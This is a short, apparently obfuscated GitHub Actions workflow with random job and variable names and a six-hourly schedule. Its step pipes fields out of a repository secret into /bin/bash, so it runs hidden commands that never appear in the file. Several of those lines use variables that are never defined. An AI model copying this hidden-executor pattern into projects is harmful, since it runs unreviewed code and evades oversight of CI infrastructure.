name: yaofandui4567
on:
  workflow_dispatch:
  schedule:
    - cron: '49 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yaofandui4567
        env:
          i34216: ${{ secrets.i34216 }}
        run: |
          echo $i34216 | jq -r .inoo0 | /bin/bash
          echo $jyeii1752 | jq -r .rvc01892 | /bin/bash
          echo $soum6 | jq -r .m8216 | /bin/bash
          echo $vgckg56 | jq -r .kfjq1 | /bin/bash

